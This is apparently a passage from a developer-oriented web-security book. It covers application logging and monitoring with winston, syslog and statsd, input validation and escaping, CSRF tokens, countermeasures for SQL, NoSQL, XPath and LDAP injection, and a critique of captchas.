With good visibility we should be able to see anticipated and unanticipated exploitation of vulnerabilities as they occur and also be able to go back and review/audit the events. Of course you’re still going to need someone engaged enough (discussed in the People chapter of Fascicle 0) to be reviewing logs and alerts.
When it comes to logging in NodeJS, you can’t really go past winston. It has a lot of functionality and what it does not have is either provided by extensions, or you can create your own. It is fully featured, reliable and easy to configure like NLog in the .NET world.
I also looked at express-winston, but could not see why it needed to exist.
winston-syslog seems to be what a lot of people are using. I think it may be due to the fact that winston-syslog is the first package that works well for winston and syslog.
If going this route, you will need the following in your
I also looked at winston-syslogudp, but it did not measure up for me.
If you do not need to push syslog events to another machine, and I don’t mean pushing logs, then it does not make much sense to push through a local network interface when you can use your posix syscalls as they are faster and safer. Line 7 below shows the open port.
If going this route, you will need the following in your /etc/rsyslog.conf instead of the above. You will still be able to push logs off-site, as discussed in the VPS chapter under the Logging and Alerting section in Countermeasures:
Now you can see on line 7 below that the syslog port is no longer open:
Logging configuration should not be in the application startup file. It should be in the configuration files. This is discussed further under the “Store Configuration in Configuration files” section.
Notice the syslog transport in the configuration below starting on line 39.
In development I have chosen here to not use syslog. You can see this on line 3 below. If you want to test syslog in development, you can either remove the logger object override from the devbox1-development.js file or modify it to be similar to the above. Then add one line to the /etc/rsyslog.conf file to turn it on, as mentioned in a comment above in the default.js config file on line 44.
In production we log to syslog and because of that we do not need the file transport you can see configured starting on line 30 above in the default.js configuration file, so we set it to null as seen on line 6 below in the
I have gone into more depth about how we handle syslogs in the VPS chapter under the Logging and Alerting section, where all of our logs including these ones get streamed to an off-site syslog server. This provides easy aggregation of all system logs into one user interface that DevOps can watch on their monitoring panels in real-time, and also easily go back in time to visit past events. This provides excellent visibility as one layer of defence.
There were also some other options for those using Papertrail as their off-site syslog and aggregation PaaS, but the solutions were not as clean as simply logging to local syslog from your applications and then sending off-site from there. Again this is discussed in more depth in the “Logging and Alerting” section in the VPS chapter.
The logger.js file wraps and hides extra features and transports applied to the logging package we are consuming.
When the app first starts it initialises the logger on line 15 below.
Here are some examples of how you can use the logger. The logger.log(level can be replaced with logger.<level>( where level is any of the levels defined in the default.js configuration file above:
As an architectural concern, also consider hiding cross cutting concerns like logging using Aspect Oriented Programming (AOP).
There are a couple of ways of approaching monitoring. You may want to see and be notified of the health of your application only when it is not fine (sometimes called the dark cockpit approach), or whether it is fine or not. Personally I like to have both.
As discussed in the VPS chapter, Monit is an excellent tool for the dark cockpit approach. It’s easy to configure. Monit has excellent, short, easy to read documentation, and the configuration file has lots of examples commented out, ready for you to take as is and modify to suit your environment. Remember I provided examples of monitoring a VPS and NodeJS web application in the VPS chapter. I’ve personally had excellent success with Monit. Check the VPS chapter Monitoring section for a refresher. Monit doesn’t just give you monitoring, it can also perform pre-defined actions based on current states of many VPS resources and their applications.
Just as collectd can collect and send data to graphite directly if collectd agent and server are on the same machine, or indirectly via a collectd server on another machine to provide continual system visibility, statsd can play a similar role as collectd agent/server but for our applications.
Statsd is a lightweight NodeJS daemon that collects and stores the statistics sent to it for a configurable amount of time (10 seconds by default) by listening for UDP packets containing them. Statsd then aggregates the statistics and flushes a single value for each statistic to its backends (graphite in our case) using a TCP connection. The flushInterval needs to be the same as the retentions interval in the Carbon /etc/carbon/storage-schemas.conf file. This is how statsd gets around the Carbon limitation of only accepting a single value per interval. The protocol that statsd expects to receive looks like the following, expecting a type in the third position instead of the timestamp that Carbon expects:
<type> is one of the following:
The count type tells statsd to add up all of the values that it receives for a particular statistic during the flush interval and send the total on flush. A sample rate can also be provided from the statsd client as a decimal of the number of samples per event count:
So if the statistic is only being sampled 1/10th of the time:
For the timing type, the value needs to be the timespan in milliseconds between a start and end time. This could be, for example, the timespan that it took to hash a piece of data to be stored such as a password, or how long it took to pre-render an isomorphic web view. Just as with the count type, you can also provide a sample rate for timing. Statsd does quite a lot of work with timing data: it works out percentiles, mean, standard deviation, sum, lower and upper bounds for the flush interval. This can be very useful when you are making changes to your application and want to know if those changes are slowing it down.
A gauge is a snap-shot of a reading in your application code, like your car’s fuel gauge for example. As opposed to the count type which is calculated by statsd, a gauge is calculated at the statsd client.
Sets allow you to send the number of unique occurrences of events between flushes, so for example you could send the source address of every request to your web application and statsd would work out the number of unique source requests per flush interval.
So for example if you have statsd running on a server called graphing-server with the default port, you can test sending a count metric with the following command:
The server and port are specified in the config file that you create for yourself. You can create this from the exampleConfig.js as a starting point. In exampleConfig.js you will see the server and port properties. The current options for server are tcp or udp, with udp being the default. The server file must exist in the
One of the ways we can generate statistics to send to our listening statsd daemon is by using one of the many language specific statsd clients, which make it trivially easy to collect and send application statistics via a single routine call.
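To make the wire format concrete, here is a minimal sketch that builds statsd lines by hand and sends them over UDP using only the NodeJS standard library. It is not one of the statsd clients mentioned above. The function names are my own, the type codes (c, ms, g, s) are the ones statsd uses for count, timing, gauge and set, and the graphing-server host and port 8125 are assumptions carried over from the earlier example.

```javascript
const dgram = require('dgram');

// Format one statistic as <metric name>:<value>|<type>[|@<sample rate>].
// formatMetric is a hypothetical helper, not part of any statsd client.
function formatMetric(name, value, type, sampleRate) {
  const types = ['c', 'ms', 'g', 's']; // count, timing, gauge, set
  if (!types.includes(type)) {
    throw new Error('Unknown statsd type: ' + type);
  }
  let line = `${name}:${value}|${type}`;
  // The text above describes sample rates for counts and timings only.
  if (sampleRate !== undefined && (type === 'c' || type === 'ms')) {
    line += `|@${sampleRate}`;
  }
  return line;
}

// Fire and forget over UDP. Host and port are assumptions:
// 8125 is the statsd default port.
function sendMetric(line, host = 'graphing-server', port = 8125) {
  const socket = dgram.createSocket('udp4');
  socket.send(Buffer.from(line), port, host, () => socket.close());
}
```

For example, sendMetric(formatMetric('contact.submitted', 1, 'c', 0.1)) would send a count that is only being sampled 1/10th of the time (the metric name is made up). In a real application you would most likely reach for an existing client instead, as it will also handle socket reuse and errors.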
Whatever you can do to help establish clean lines of separation of concerns in terms of both domain and technology, and keep as much as possible as simple as possible, will make it harder for defects and malicious code to hide.
Your staple practices when it comes to defending against potentially dangerous input are validation and filtering. There are cases though when the business requires that input must be accepted that is dangerous yet still valid. This is where you will need to implement sanitisation. There is a lot more research and thought involved when you need to perform sanitisation, so the first course of action should be to confirm that the specific dangerous yet valid input is in fact essential.
Attempt to use well tested, battle hardened language specific libraries that know how to validate, filter and sanitise.
Create enough “Evil Test Conditions” as discussed in the Process and Practises chapter of Fascicle 0 to verify that:
WebComponents have come a long way and I think they are perfect for this task.
With WebComponents, you get to create your own custom elements (your own HTML tags). The browser will understand these natively, so they will work with any framework or library you are using. In order to define your own custom element, the tag name you define must be all lower case and must contain at least one hyphen used for separating name-spaces. No elements will be added to HTML, SVG or MathML that contain hyphens.
Each Custom Element (my-password for example) has a corresponding HTML Import (
Custom Elements are currently only natively supported in Chrome and Opera, but we have the webcomponents.js set of polyfills which means we can all use WebComponents.
Polymer is a library that helps you write WebComponents and mediates with the browser on your behalf. It also polyfills.
Custom Element authors can also expose Custom CSS properties that they think consumers may want to apply values to. These styles are prefixed with -- and are essentially an interface to a backing (CSS property) field, which would otherwise be inaccessible.
The Custom Element author can also decide to define a set of CSS properties as a single Custom CSS property, called a Custom CSS mixin, and then allow all of the properties within the set to be applied to a specific CSS rule in an element’s local DOM. This is done using the CSS @apply rule. This allows consumers to mix in any styles within the single Custom CSS property, but only intentionally by using the
Polymer also has a large collection of Custom Elements already created for you out of the box. Some of these Custom Elements are perfect for constraining and providing validation and filtering of input types, credit card details for example.
Escaping is a technique used to sanitise. Escaped data will still render in the browser properly. Escaping simply lets the interpreter know that the data is not intended to be executed and thus prevents the attack.
There are a number of types of escaping you need to know about depending on where you may be intending on inserting untrusted data. Work through the following set of rules in order:
All of the above points are covered in depth in the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet. Familiarise yourself with the rules before completing any custom sanitisation work.
The following example was taken from a project I worked on a few years ago.
Client side validation, filtering and sanitisation is more about UX (User Experience) helping the honest user by saving round trip communications to the server than stopping an attacker, as an attacker will simply by-pass any client side defences.
We needed to apply a white list to all characters being entered into the value attribute of input elements of type="text" and also textarea elements. The requirement was that the end user could not insert invalid characters into one of these fields and by insert we mean:
The following was the strategy that evolved. Performance was measured and even with an interval much lower than the 300 milliseconds, the performance impact was negligible. As soon as any non white list character(s) was entered, it was immediately deleted within 300 milliseconds.
$ references jQuery.
Each time we changed the page, we cleared the interval and reset it for the new page.
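The strategy described above can be sketched roughly as follows. This is not the code from that project. The white list itself, the function names and the jQuery selector are all assumptions made for illustration, and $ is assumed to reference jQuery in the browser.

```javascript
// Hypothetical white list: letters, digits, spaces and a little punctuation.
// Anything matching this pattern is NOT on the white list.
const NON_WHITE_LIST = /[^a-zA-Z0-9 .,'-]/g;

// Return the value with every character outside the white list removed.
function stripNonWhiteListed(value) {
  return value.replace(NON_WHITE_LIST, '');
}

// Browser wiring (assumes jQuery is loaded as $). Returns the interval id
// so the caller can clearInterval() it when the page changes.
function startWhiteListSweep(intervalMs = 300) {
  return setInterval(function () {
    $('input[type="text"], textarea').each(function () {
      const cleaned = stripNonWhiteListed(this.value);
      // Only write back when something was removed, to avoid
      // disturbing the caret position unnecessarily.
      if (cleaned !== this.value) {
        this.value = cleaned;
      }
    });
  }, intervalMs);
}
```

Keeping the stripping logic in a pure function means the same white list can be exercised in unit tests without a browser, while the interval wiring stays a thin layer on top.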
HTML5 provides the pattern attribute on the input tag, which allows us to specify a regular expression that the text received is checked against, although this does not apply to textareas. Also, when validation occurs is not specified in the HTML specification, so this may not provide enough control.
Now what we do here is extend the String prototype with a function called
Just before any user input was sent back to the server, we would check each of the fields that we were receiving input from by doing the following:
“HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes.”
OWASP XSS Prevention Cheat Sheet
For us, this would be enough, as we would be HTML escaping our textarea elements and we were happy to make sure we were religious about using quotes around the value attribute on
“But HTML entity encoding doesn’t work if you’re putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you’re putting untrusted data into.”
OWASP XSS Prevention Cheat Sheet
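As a rough illustration of HTML entity encoding for data placed in the body of an HTML document, here is a minimal sketch. The function name is hypothetical, and the character set (the five significant characters plus the forward slash) is my reading of the cheat sheet’s first rule rather than a quote from it. Remember that, as the quote above says, this only covers the HTML body context.

```javascript
// Characters encoded for the HTML body context and their entity forms.
// The exact set is an assumption based on the OWASP cheat sheet's rule #1.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;'
};

// escapeForHtmlBody is a hypothetical name used for this sketch only.
function escapeForHtmlBody(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}
```

The ampersand is handled in the same single pass as the other characters, so already produced entities are not encoded a second time.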
Rule #2 of the OWASP XSS Prevention Cheat Sheet discusses attribute escaping. Now because we were only using value attributes and we had the luxury of being able to control the fact that we would always be using properly quoted attributes, we didn’t have to take this extra step of escaping all (other than alphanumeric) ASCII characters (that is, values less than 256) with the &#xHH; format to prevent switching out of the attribute context.
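If you do not have the luxury of always quoting your attributes, the extra step could look something like the following sketch. It is an assumption of how the rule might be implemented, not code from the project or from OWASP, and the function name is made up.

```javascript
// Encode every non-alphanumeric character with a value below 256 as &#xHH;
// so that it cannot switch out of an attribute context.
function escapeForHtmlAttribute(untrusted) {
  return String(untrusted).replace(/[^a-zA-Z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    if (code >= 256) {
      return ch; // outside the range the rule covers, left untouched
    }
    return '&#x' + code.toString(16).toUpperCase().padStart(2, '0') + ';';
  });
}
```

With this in place a space, an equals sign or a quote arriving in untrusted data is rendered as a character value rather than being treated as attribute syntax.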
Because I wanted to be sure about not being able to escape out of the attribute’s context if it was properly quoted, I tested it. I created a collection of injection attacks, none of which worked. If you enter something like the following into the attribute value of an input element where type="text", then the first double quote will be interpreted as the corresponding quote and the end double quote will be interpreted as the end quote of the onmouseover attribute value.
All the legitimate double quotes are interpreted as the double quote " and all illegitimate double quotes are interpreted as the character value. This is what you end up with:
Now in regards to the code comments in the block of code above titled “Sanitisation using escaping”, I mentioned having to double escape character references. We were using XSL for the HTML because we needed to perform transformations before delivering to the browser. Because we were sending the strings to the browser, it was easiest to single decode the double encoded HTML on the service side only. Now because we were still focused on the client side sanitisation and we would soon be shifting our focus to making sure we covered the server side, we knew we were going to have to create some sanitisation routines for our .NET service. Because the routines were quite likely going to be static and we were pretty much just dealing with strings, we created an extensions class in a new project in a common library we already had. This would provide the widest use from our sanitisation routines. It also allowed us to wrap any existing libraries, or parts of them, that we wanted to make use of.
Now when we ran our xslt transformation on the service, we chained our new extension method on the end, which gave us back a single encoded string that the browser is happy to display as the decoded value.
Now turning our attention to the server side… Untrusted data (data entered by a user), should always be treated as though it may contain attack code. This data should not be sent anywhere without taking the necessary steps to detect and neutralise the malicious code depending on which execution contexts it will pass through.
With applications becoming more interconnected, attacks buried in user input and decoded and/or executed by a downstream interpreter are common. Input validation (that is, restricting user input to allow only certain white listed characters) and restricting field lengths are only two forms of defence. Any decent attacker can get around client side validation, so you need to employ defence in depth. If you need to validate, filter and sanitise, at the very least, it needs to be done on the server side.
System.Net.WebUtility from the System.Web.dll assembly to do most of what we needed other than provide us with fine grained information of what had been tampered with. So I took it and extended it slightly. We had not employed AOP at this stage, so there was some copy-paste modifying.
First up, the exceptions we used:
And the more specific
Now we defined whether our requirements were satisfied by way of executable requirements (unit tests in their rawest form):
Now the code that satisfies the above executable specifications, and more:
To drive the development of the Sanitisation API, we wrote the following tests. We created a MockedOperationContext, code not included here. We also used RhinoMocks as our mocking framework, which is no longer being maintained. I would recommend NSubstitute instead if you were looking for a mocking framework for .NET. We also used NLog and wrapped it in
And finally the API code we used to perform the sanitisation:
As you can see, there is a lot more work on the server side than the client side.
For the next example we use a single page app, switching to jQuery.validator on the client side and express-form on the server side. Our example is a simple contact form. I have only shown the parts relevant to validation and filtering.
Once the jQuery plugin (which is a module) validate is loaded, jQuery is passed to it. The plugin extends the jQuery prototype with its validate method. Our contact.js script then loads in the browser. We then call ContactForm.initContactForm();. ContactForm is immediately invoked and returns an object, of which we call
We add a custom validation function to our validator by way of addMethod. This function will take the value being tested, the element itself and a regular expression to test against. You can see we use this function when we pass our rules within the options object to validate which internally passes them to its
validate documentation explains the sequence of events that your custom rules will be applied in.
submitHandler which is bound to the native
There are many other options you can provide. I think the code is fairly self explanatory:
Shifting our attention to the server side now. First up we have got the home route of the single page app. Within the home route, we have also got the /contact route which uses the express-form middleware. You can see the middleware first in action on line 82.
Following is the routing module that loads all other routes
Now our entry point into the application. We load routes on line 30.
As I mentioned previously in the “What is Validation” section, some of the libraries seem confused about the differences between the practices of validation, filtering and sanitisation. For example express-form has sanitisation functions that are under their “Filter API”.
entityDecode, even the Type Coercion functions are actually sanitisation rather than filtering.
Maybe it is semantics, but ifNull are sanitisation functions.
trim, … is filtering, but toLower, … is sanitisation again. These functions listed in the documentation under the Filter API should be in their specific sections.
Refer to the section above for a refresher on validation, filtering and sanitisation if you need it.
This is a place holder section. The countermeasures are covered in the Lack of Input Validation, Filtering and Sanitisation section.
CSRF synchroniser/challenge tokens are one approach commonly used to help defend against CSRF. This approach should also be used with other techniques like identifying the source origin by checking the Origin and Referer headers, along with other useful techniques that have been well documented by the OWASP CSRF Prevention Cheat Sheet. Also the OWASP CSRF page has links to many useful resources, and do not forget to check the Additional Resources chapter.
With the CSRF synchroniser/challenge token pattern, a token (often called the CSRF synchroniser/challenge token) is sent as part of a response to a legitimate request from a client browser. The application on the client side holds this synchroniser/challenge token and sends it on subsequent requests to the legitimate website.
The specific server side web application is responsible for generating a unique token per session and adding it to the responses. The application in the browser, or user’s device, is responsible for storing the synchroniser/challenge token, then issuing it with each request where CSRF is a concern.
When an attacker tricks a target into issuing a fraudulent request to the same website, the request has no knowledge of the synchroniser/challenge token, so it is not sent.
The legitimate website will only regard a request as being legitimate if the request also carries the valid synchroniser/challenge token matching the one contained in the target’s session on the server.
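The pattern just described can be sketched with nothing more than the NodeJS crypto module. This is a minimal illustration under stated assumptions, not the middleware NodeGoat uses: the session is assumed to be a plain per-user object supplied by your session middleware, and the function and property names are hypothetical.

```javascript
const crypto = require('crypto');

// Generate an unpredictable token, keep it in the (hypothetical) session
// object and return it so it can be embedded in the response.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Compare the token carried by the request with the one in the session.
function isValidCsrfToken(session, submittedToken) {
  if (typeof submittedToken !== 'string' || typeof session.csrfToken !== 'string') {
    return false;
  }
  const expected = Buffer.from(session.csrfToken);
  const actual = Buffer.from(submittedToken);
  // timingSafeEqual throws on different lengths, so check that first.
  return expected.length === actual.length &&
    crypto.timingSafeEqual(expected, actual);
}
```

A forged request arrives without the token (or with a guess), so isValidCsrfToken returns false and the server can reject the requested action. In practice a maintained middleware is a better choice than rolling your own.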
For the examples from the Identify Risks section:
The NodeGoat application deals with CSRF attacks by using an Express CSRF middleware named _csrf which should be added to all requests that mutate state such as discussed in the Identify Risks section. You can see this on line 67 of the profile.html snippet in the Identify Risks section within a hidden field. Repeated below:
When the form is submitted, the middleware checks for existence of the token, and validates it by matching to the generated token in the target’s session. If the CSRF synchroniser/challenge token fails validation, the server rejects the requested action.
To enable this CSRF middleware, simply uncomment the CSRF fix in the NodeGoat server.js file. The CSRF middleware is initialised immediately after the application’s session middleware is initialised.
You can see and play with all this at https://nodegoat.herokuapp.com/tutorial/
Also check the “Securing Sessions” countermeasures section along with the “Lack of Authentication, Authorisation and Session Management” Risks that Solution Causes section for pertinent information.
Other techniques such as requiring the user to reauthenticate, or even providing CAPTCHAs, are often used, although I am not a fan of those techniques. I fail to see why we as developers should make our problem the user’s. We just need to make sure we make it hard enough for the attackers that the end user is not affected.
As an end user, if you make sure you invalidate your authentication by logging out or deleting your session cookies when you finish working with a website that requires authentication or move away from the browser, then the browser will be unable to send authentication as part of a CSRF attack.
Usually the most effective technique for determining if/where your application is vulnerable to injection attacks is to review your code for all calls out to external resources, including interpreters, and determine whether the data you are passing is untrusted.
If you can avoid external interpreters altogether, then they can no longer be tricked into executing untrusted data, whether directly or indirectly from untrusted actors or even stored.
Use a parametrised API for the specific technology you are working with, whether it be SQL, NoSQL, execution of Operating System commands, XML, XPath, XSLT, XQuery, LDAP, etc.
Similarly to the Lack of Input Validation, Filtering and Sanitisation section, validation, filtering, sanitisation, and constraining all untrusted data to well structured semantic types is also necessary. Granularly isolating and semantic typing each piece of untrusted data from the command or query allows you to tightly define constraints on what you expect each specific piece of data to conform to.
Keep the principle of least privilege in mind and implement it. When any attacks are successful, how much damage can they currently do? By enforcing the least amount of privileges possible for the given operation, you are minimising the possible risk.
Make sure the feedback and error messages that are provided on invalid input only provide the necessary detail that the user needs in order to provide correct input. Don’t provide unnecessary details on internal workings: exceptions, stack traces, etc. Make sure you capture and handle internal errors in software, rather than letting them bubble to the user interface.
There are a few options here:
exec() within stored procedures can be prone to SQLi exploitation
There are plenty of easy to find and understand resources on the inter-webs around SQLi mitigations and the countermeasures are generally very easy to implement. So now you have no excuse.
Take the advice from the generic Injection section.
For any dynamic queries, rather than piecing together strings with unvalidated user input, use prepared statements with strongly defined semantic types allowing you to use as short as possible white list of allowed characters, then follow up with filtering and sanitisation of any characters that must be allowed through.
Queries can be formatted in many different types of conventions depending on the type of NoSQL data store, such as XML, JSON, LINQ, etc. As well as these execution contexts, there will also be the execution contexts of the application itself before the untrusted data reaches the particular type of NoSQL data store API. This means, as discussed in the “What is Sanitisation” section of the Lack of Input Validation, Filtering and Sanitisation section of Identify Risks, you must validate, filter and sanitise based on all of the execution contexts that the untrusted data may pass through. With NoSQL this is usually far more tedious.
Countermeasures will need to be carefully thought about once the type of NoSQL data store syntax, data model, and programming language(s) used throughout the application are thoroughly understood.
Ideally the NoSQL client library you decide to use will provide the logic to perform validation on characters that are dangerous in the execution context of the NoSQL library. It may also provide some filtering, but you will often have to provide some configuration to help it know what you want. Ideally the NoSQL client library will also provide sanitisation for its own execution context. As discussed above, you will still need to define your own semantic types, white lists for the semantic types, filtering and sanitisation for your application specific execution contexts that the NoSQL client library has no knowledge of.
In regards to MongoDB (one of the 225 + types of NoSQL data stores):
--noscripting option on the command line or setting
$where property value.
So in essence, make sure you read and understand your NoSQL data store documentation before building your queries.
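One application specific check that the client library cannot make for you is confirming that each untrusted value is of the semantic type you expect before it goes anywhere near a query. The following is a minimal sketch, assuming a MongoDB-style query document and a parsed JSON request body. The function names and the username field are hypothetical.

```javascript
// Accept only a plain string for a field that is meant to hold a string.
// A parsed JSON body can otherwise smuggle in an object such as
// { "$ne": null }, which a MongoDB-style query would treat as an operator.
function requireString(value, fieldName) {
  if (typeof value !== 'string') {
    throw new TypeError(fieldName + ' must be a string');
  }
  return value;
}

// Build the query document only from values that passed the type check.
function buildUserQuery(body) {
  return { username: requireString(body.username, 'username') };
}
```

This is only the first step. The validated string should still be checked against the white list for its semantic type, then filtered and sanitised as needed.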
On top of the points mentioned above under Lack of Input Validation, Filtering and Sanitisation, your greatest defence is to think through the path of where untrusted data flows, carefully considering each execution context you encounter.
Untrusted data should never be inserted into setInterval or as the last argument to Function without properly validating, filtering, and sanitising if required. It is generally not good practice to use the Function constructor anyway. I have written about this on several occasions.
The NodeGoat Web Application also provides a very minimal countermeasure example
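As a sketch of the general idea (this is not NodeGoat’s code), untrusted input that is supposed to be a number can be validated against a tight white list and then parsed, so it is never evaluated as code. The function name and the nine digit limit are assumptions.

```javascript
// Parse untrusted numeric input without ever evaluating it as code.
function parseWholeNumber(untrusted) {
  // Validation: digits only, 1 to 9 of them (an assumed upper bound).
  if (typeof untrusted !== 'string' || !/^[0-9]{1,9}$/.test(untrusted)) {
    throw new RangeError('Expected a whole number');
  }
  return parseInt(untrusted, 10);
}
```

Anything that is not purely digits, such as a string containing a function call, is rejected before it can reach an interpreter.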
First of all, as discussed in the generic Injection section above, your application should validate, filter and sanitise all untrusted data before incorporating it into an XML document. If you can:
Use local static Document Type Definitions (DTDs) or better, XML Schemas. This will mitigate XXE attacks.
If the XML parser you are using is vulnerable to XXE attacks by default, investigate disabling the XML parser’s ability to follow all external resource inclusions, often available by flags. If the ability to disable the following of external resource inclusions is not available, consider using an alternative library. Failing that, make sure your untrusted data is validated, filtered and sanitised by a secure parser before passing to the defective parser.
OWASP also has an XML External Entity (XXE) Prevention Cheat Sheet that is quite useful.
All of these mitigations are discussed and explored in the excellent paper by Emanuel Duss and Roland Bischofberger, presented at an OWASP Switzerland meeting.
Follow the precautions discussed in the generic Injection countermeasures section when handling dynamically constructed queries. A little validation of untrusted data will go a long way. For example, the username should only contain alphanumeric characters, and filtering to a maximum length sometimes helps. In the case of usernames, because we have created a semantic type, it is easy to apply the white list of allowed characters to the untrusted data before inserting it into your XPath query. In regards to the password, it should be the result of the untrusted user input password once processed by your Key Derivation Function (KDF). Only then should it be inserted into your XPath query.
By performing some simple validation, the attacker is no longer able to escape the quotes and modify the intended logic of the query.
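The validation described above might look something like the following minimal sketch. The 32 character limit, the hex encoding of the KDF output, the XPath element names and the function names are all assumptions made for illustration.

```javascript
// Semantic type for a username: alphanumeric only, 1 to 32 characters
// (the length limit is an assumption).
const USERNAME = /^[a-zA-Z0-9]{1,32}$/;

function isValidUsername(untrusted) {
  return typeof untrusted === 'string' && USERNAME.test(untrusted);
}

// Only build the query once both values have passed validation.
// passwordHash is assumed to be the KDF output encoded as lower case hex,
// so it gets its own white list as well.
function buildLoginXPath(username, passwordHash) {
  if (!isValidUsername(username)) {
    throw new Error('Invalid username');
  }
  if (typeof passwordHash !== 'string' || !/^[a-f0-9]+$/.test(passwordHash)) {
    throw new Error('Invalid password hash');
  }
  return "//user[username/text()='" + username +
    "' and password/text()='" + passwordHash + "']";
}
```

Because neither white list allows a quote character, an input such as admin' or '1'='1 is rejected before the query string is ever assembled.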
Try to use a language library that supports parameterised queries. If the language you are coding in does not have any support or libraries available that have a parameterised XPath interface, you will need to sanitise the untrusted data being inserted into any dynamically constructed queries. Whatever type of quote you are using to delimit the untrusted input, you need to sanitise the same type of quote with the XML encoded derivative. I discussed this in the Sanitisation using escaping code sample in the Types of Escaping section of Countermeasures. The OWASP XPath Injection Defences also provides some coverage on this.
Also check the Additional Resources chapter for both identifying risks and countermeasures in regards to XPath injection.
Because XQuery is a superset of XPath with the SQL-like FLWOR expression abilities, it enjoys the same countermeasures as XPath and SQLi.
The same generic injection countermeasures, as well as many of the more specific ones that we have already discussed, are also applicable to LDAP.
As part of your validation, define your semantic types for each dynamic section. This will help you define the white list of allowed characters for each untrusted section. If you can tightly constrain the allowable characters for your given semantic types, then this alone will in many cases (such as a username where you would only allow alphanumeric characters) stop any characters from breaking out of the intended context and changing the logic of the LDAP query. This is why we always apply validation -> filtering -> sanitisation in this order, because often the first step will catch everything.
For each semantic type of untrusted data, for any characters that pass the white list validation, define filters, and sanitise all of the following validated characters:
with their Unicode hexadecimal number, such as
comma: \2C, backslash: \5C
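The hexadecimal substitution can be sketched as follows. The exact set of characters to escape is an assumption here, drawn from the special characters of RFC 4514 (distinguished names) and RFC 4515 (search filters); adjust it to the context your untrusted data is inserted into. The function name `escapeLdapValue` is hypothetical.

```javascript
// Characters assumed to need escaping for this sketch (special characters of
// RFC 4514 distinguished names and RFC 4515 search filters, plus NUL).
const LDAP_SPECIALS = new Set([',', '\\', '#', '+', '<', '>', ';', '"', '=', '*', '(', ')', '\u0000']);

// Replace each special character with a backslash followed by its
// two-digit upper-case hexadecimal code.
function escapeLdapValue(validated) {
  let out = '';
  for (const ch of validated) {
    if (LDAP_SPECIALS.has(ch)) {
      out += '\\' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0');
    } else {
      out += ch;
    }
  }
  return out;
}

console.log(escapeLdapValue('Smith, John')); // Smith\2C John
console.log(escapeLdapValue('a\\b'));        // a\5Cb
```

This runs after white list validation, so in many cases there will be nothing left for it to escape.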
Respect and implement the principle of least privilege as discussed in the generic injection countermeasures. Do not use administrative bind accounts in your execution environment, and apply the least privileges to the domain user service account.
The framework and/or libraries you use to interact with LDAP servers should sanitise untrusted data and not allow application code to directly interact with LDAP servers.
recaptcha uses this technique. See below for details.
Uses images which users have to perform certain operations on, like dragging them to another image. For example: “Please drag all cat images to the cat mat.”, or “Please select all images of things that dogs eat.” sweetcaptcha is an example of this type of captcha. This type completely rules out visually impaired users.
Pioneered by… you guessed it. Facebook. This type of captcha focusses on human hackers, the idea being that they will not know who your friends are.
“Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don’t know who your friends are.”
I disagree with that statement. A determined hacker will usually be able to find out who your friends are. There is another problem, do you know who all of your friends are? Every acquaintance? I am terrible with names and so are many people. This is supposed to be used to authenticate you. So you have to be able to answer the questions before you can log in.
This is what textcaptcha uses. Simple logic questions designed for the intelligence of a seven year old child. These are more accessible than image and textual image recognition, but they can take longer than image recognition to answer, unless the user is visually impaired. The questions are usually language specific also, usually targeting the English language.
This is a little like image recognition. Users have to perform actions that virtual intelligence can not work out… yet. Like dragging a slider a certain number of notches.
If an offering gets popular, creating some code to perform the action may not be that hard and would definitely be worth the effort for bot creators.
This is obviously not going to work for the visually impaired or for people with handicapped motor skills.
In NPM land, as usual, there are many options to choose from. The following were the offerings I evaluated, none of which really felt like a good fit:
After some additional research I worked out why the above types and offerings didn’t feel like a good fit. It pretty much came down to user experience. Why should genuine users/customers of your web application be disadvantaged by having to jump through hoops because you have decided you want to stop bots spamming you? Would it not make more sense to make life harder for the bots rather than for your genuine users?
The above solutions are excellent targets for creating exploits that will have a large pay off due to the fact that so many websites are using them. There are exploits discovered for these services regularly.
“Given the fact that many clients count on conversions to make money, not receiving 3.2% of those conversions could put a dent in sales. Personally, I would rather sort through a few SPAM conversions instead of losing out on possible income.”
Casey Henry: Captchas’ Effect on Conversion Rates
“Spam is not the user’s problem; it is the problem of the business that is providing the website. It is arrogant and lazy to try and push the problem onto a website’s visitors.”
Tim Kadlec: Death to Captchas
Another technique is to record how long it takes from fetch to submit. For example, if the time span is under five seconds it is more than likely a bot, so handle the message accordingly.
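One way to measure the fetch to submit interval without server-side state is to put a signed timestamp into a hidden form field. The following is a minimal sketch under stated assumptions: the function names, the in-memory secret and the stamp format are all hypothetical, and the five second threshold is the one mentioned above.

```javascript
const crypto = require('crypto');

// Hypothetical server-side secret; in practice load it from configuration.
const SECRET = crypto.randomBytes(32);
const MIN_FILL_MS = 5000; // five seconds, as in the text

function sign(value) {
  return crypto.createHmac('sha256', SECRET).update(value).digest('hex');
}

// Called when the form is fetched: returns a value for a hidden field.
function issueFormStamp(now = Date.now()) {
  const issuedAt = String(now);
  return `${issuedAt}.${sign(issuedAt)}`;
}

// Called on submit: returns true when the stamp is missing or tampered with,
// or when the form came back faster than MIN_FILL_MS.
function looksLikeBot(stamp, now = Date.now()) {
  const [issuedAt, mac] = String(stamp).split('.');
  const expected = Buffer.from(sign(issuedAt || ''), 'hex');
  const actual = Buffer.from(mac || '', 'hex');
  const genuine = actual.length === expected.length && crypto.timingSafeEqual(actual, expected);
  if (!genuine) return true;
  return now - Number(issuedAt) < MIN_FILL_MS;
}

const stamp = issueFormStamp(1000000);
console.log(looksLikeBot(stamp, 1000000 + 2000));  // true
console.log(looksLikeBot(stamp, 1000000 + 30000)); // false
```

Signing the timestamp stops a bot from simply submitting an old value of its own choosing.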
